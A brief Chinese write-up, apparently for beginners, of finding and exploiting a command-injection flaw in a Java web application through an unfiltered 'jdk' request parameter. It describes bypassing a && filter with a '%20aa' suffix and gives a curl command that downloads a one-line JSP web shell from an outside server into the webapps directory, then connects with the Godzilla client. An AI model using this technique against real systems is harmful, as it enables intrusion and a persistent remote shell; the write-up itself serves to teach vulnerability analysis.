最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。
从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。
接着来找一下这个方法的调用链,
可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。
然后找一下这个jdk参数是否是我们可控的,
上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。
执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。
最终经过多次FUZZ尝试发现在命令后面加上%20aa就可以正常执行命令了,尝试直接echo写shell没成功,使用下载文件的方式getshell。
搭建一个http服务,添加一句话木马文件
执行下面的命令进行getshell
curl%20-o%20../../webapps/xxxxx/xx.jsp%20http://xx.xx.xx.xx/hoo.jsp%20aa
使用哥斯拉进行连接
